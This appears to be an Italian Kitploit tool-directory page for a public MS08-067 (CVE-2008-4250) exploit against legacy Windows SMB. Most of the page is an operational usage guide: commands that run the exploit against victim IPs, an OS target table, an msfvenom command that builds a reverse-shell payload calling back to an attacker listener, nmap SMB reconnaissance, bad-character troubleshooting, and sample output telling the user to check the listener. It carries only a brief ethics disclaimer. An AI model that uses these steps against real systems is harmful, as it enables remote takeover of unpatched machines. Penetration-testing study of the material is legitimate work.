Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Exploit_MS08-067 — MS08-067 | CVE-2008-4250 | Kitploit
Strumenti/GitHubGitHub/notrustedx/exploit_ms08-067
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodePenetration TestingStrumento di Accesso Remoto
GitHubnotrustedx/exploit_ms08-067

Exploit_MS08-067

MS08-067 | CVE-2008-4250

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Guida Completa all'Uso: # Exploit MS08-067 Migliorato

📌 Uso Base

root@kitploit:~
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]

🎯 Esempi Pratici

1. Windows XP SP0/SP1 (Porta Predefinita 445)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.100 1

2. Windows 2003 SP1 English (Porta 139)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139

3. Con Shellcode Personalizzato

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin

🔍 Parametri Obbligatori

ParametroDescrizioneValori Validi
IP_VÍCTIMAIP del bersaglioQualsiasi IPv4
VERSIÓN_OSVersione del SO vulnerabile1-7 (vedi tabella)

📋 Tabella delle Versioni SUPPORTATE

ValoreSistema OperativoArchitettura
1Windows XP SP0/SP1 Universalx86
2Windows 2000 Universalx86
.........

⚙️ Opzioni Aggiuntive

OpzioneDescrizioneDefault
-p/--portPorta SMB (445/139)445

🛠️ Generazione di Shellcode con msfvenom

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows

🔎 Identificazione del Bersaglio

root@kitploit:~
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>

🚨 Risoluzione dei Problemi Comuni

Errore: STATUS_OBJECT_NAME_NOT_FOUND

  1. Verifica se il servizio Browser è attivo:

    root@kitploit:~
    nmap -p 445 --script smb-enum-shares <IP>
    
  2. Prova con un altro pipe (modifica lo script):

    root@kitploit:~
    # Cambiar \\pipe\\browser por \\pipe\\srvsvc
    

Shellcode non esegue

  • Verifica i caratteri proibiti: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
  • Usa questo comando per validare:
    root@kitploit:~
     msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
    

💡 Raccomandazioni Etiche

✅ Usare solo in ambienti autorizzati
❌ Mai su sistemi di produzione senza permesso

📊 Output di Successo Atteso

root@kitploit:~
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!

⚠️ Nota: Questo exploit non funziona su sistemi con patch del bollettino MS08-067.

Scarica lo strumento
-t/--timeout
Timeout in secondi
5
-s/--shellcodePercorso del shellcode personalizzatoNone